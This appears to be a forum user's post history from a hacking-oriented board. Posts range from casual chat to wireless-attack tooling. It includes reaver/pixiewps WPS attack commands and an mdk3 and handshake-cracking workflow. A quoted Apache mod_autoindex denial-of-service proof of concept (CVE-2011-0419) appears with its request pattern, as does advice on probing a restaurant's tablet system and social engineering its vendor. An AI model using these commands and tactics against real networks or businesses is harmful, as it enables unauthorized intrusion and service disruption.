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Posts posted by deadlyhabit

  1. Oh I know I used to be an amateur skater in my teens and knew Bam (as big a douche irl as on his shows and sucks that bad at skating), I made the mistake of thinking a stun gun and cattle prod 2 diff times would be nahhh can't be that bad while drunk. NOPE.

    As Ren and Stimpy said, "Don't Wizz on the Electric Fence".

  2. yea it should be reaver -i wlan1mon -b ma:ca:dd:rr:es:ss -vvv -K 1 to start (pixiewps attack) or just a reaver will show all commands and options for it including the fork

    btw datahead, any chance of helping out terry's fork for the reaver pro ii? (installed pixie and your fork with a bit of pain on it, but would be nice with his gui)

  3. LOL! Where did you find this guy? I was crying with laughter here.

    The guy seemed genuinely oblivious to what was going on.

    this guy has lived through more than most can imagine...

  4. Haven't done it with Kali, but with Ubuntu, it broke grub, but that was easy to fix with a live CD/USB. Other than that, Windows 10 doesn't interact or affect it at all.

    i tried the apt-get upgrade

    apt-get dist-upgrade and it broke everything as others in this thread did.

    thankfully data backed and wiped windows completely from my lappy for kali 2.0 usb install and after the typical apt-get fixes runs like a beast so no looking back,

    bit of a learning curve on some typical stuff though same with nethunter.

  5. it has no includes so not any c derivative, it's php at best (c/c++ nerd here) if not c derivative it's python (learning now) or ruby (no desire to learn)

    it's a basic logic chain that anyone coding can follow, but since i never fucked with php and thats the header... bingo.

    oh and from fucking around in unity c# would have some includes unless this is just a lazy exploit, which it doesn't seem to be, just run on dated shit.

  6. Also, what would your favorite language be to program such and interface?

    OpenGL and SDL for graphical representation over multiple OSs and portability. (Just watch one Carmack keynote on VR

    or his usual QuakeCon keynote

    get enthralled and realize he's steps beyond what we wanna do like you and go WOW)

    I remember back in the day there was a real obscure nix distro in the works kinda in this vein based off the anime Serial Experiments Lain


    atm nothing like Hackers, Ghost in the Shell, Serial Experiments Lain, Takedown (aka Kevin Mitnick Hollywood version aka Hackers 2), or any other 3d VR surfing file shit like Lawnmower Man exists.

    We have Mr. Robot which does a good job as to what we do in Hollywood.

  7. It's a php file as

    Apache 2.2.17 mod_autoindex local/remote Denial of Service
    author: Maksymilian Arciemowicz
    CVE: CVE-2011-0419
    CWE: CWE-399
    Find some directory with supported mod_autoindex on the server. The directory should contain long filenames.
    http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]
    Tested on:
    127# httpd -v && uname -a  
    Server version: Apache/2.2.17 (Unix)
    Server built:   Dec 28 2010 13:21:44
    NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov  7 14:39:56 UTC 2010  builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386
    127# ls -la    
    total 8
    drwxrwxrwx  2 root  wheel   512 Feb  8 21:41 .
    drwxr-xr-x  7 www   wheel  1024 Jan 31 08:49 ..
    -rw-r--r--  1 www   wheel  1056 Feb  8 19:39 .htaccess
    -rw-r--r--  1 www   wheel     0 Feb  8 19:39 cx.............................................................................................................................
    -rw-r--r--  1 www   wheel  1240 Feb  8 19:42 run.php
    127# ps -aux -p 617  
    www  617 98.6  0.4 10028 4004 ?   R     7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start  
    Time = 121:43 and counting
    where http://[$localhost]:[$localport]/[$localuri]

    is a comment about its use/result

  8. I've been seeing some trends in external graphics cards for gaming. Have any of you guys used PCI/PCIe expansion bays or GPU docks for cracking or mining? What has your experience been like?

    Debating building a mini setup to use with oclhashcat (their forum is a goldmine of builds that are great and overkill for cracking).

    My gaming rig I need to upgrade my card as I have a 660ti, but seeing the 950 budget card coming out I'm waiting to see how that works for cracking.

    Check the hashcat forums for benchmarks and such as it works under nix and windows and you can game while cracking without extreme temps apparently.


    As far as the external setups on laptops for GPU(s) they seem a bit overkill as the tend to need the proper cards, cables, GPU(s), and a power supply which might as well be a mini atx.

    Especially compared to the cost of say one of the non alienware gaming laptops which even still are overpriced and way overkill.

    Ideally I think you'd want just a basic laptop to capture what needs to be cracked and ssh into a dedicated cracking box that is cheaper to build at home, upload the files and get it working vs lugging around all that extra expensive hardware to setup etc to your lappy (not to mention looks sketchy as hell).

  9. Wish I knew of something more than mdk3 or mdk3 mod as the scripts run off both of them and seemingly need to be updated for the new aircrack suite formats (been poking around).

    Working on my own python script to automate the process I usually use of:

    1.) attempt pixiewps attack

    2.) reaver or bully

    3.) a.) if long ap rate try a mdk3 attack to get it to let me get some more pins in or reset the AP

    b.) if long ap rate limiting just put my reaver pro ii or pineapple on it, and set it and forget it for a few days

    4.) try to capture a 4 way handshake and brute force it if all else fails like a non WPS access point

  10. mdk3 is available on the pineapple in the opkg section.

    Aside from revdk3 there's the VMR-MDK script by Musket Team.

    As far as running them on the pineapple, not too sure atm as they're having issues on Kali 2.0 for me currently that I'm pretty sure has to do with the newer versions of the aircrack suite.

    If I can resolve that I'll get to looking at them on the pineapple (also I may try to make a opkg of the mdk3 mod https://github.com/soxrok2212/mdk3-master ).

  11. Well after messing around with Musket Teams VMR-MDK script and poking around in ReVdk, it honestly seems like the issue is the new way you put your wireless card into monitor mode with airmon-ng changing.

    It looks like the scripts just need to be updated to the:

    airmon-ng check kill
    airmon-ng start wlan1

    method and ensure they use the wlan1mon instead of mon1 bits.

  12. Since they seem to be android based you could always try booting it into fastboot like you would say a nexus. If the restaurant offers wifi you could use an app like Fing or zANTI to try to cull some info via your own phone or tablet if you're on their network.

  13. http://elacarte.com/tablet/

    Well here's their site, just poking around at their About section (Job Listings) seems like it's Android based and Java reliant.

    If you're really interested try social engineering a brochure or detailed manual as a potential client for them.

    It also says they integrate into any POS system so you might wanna dig into those a bit more as well.

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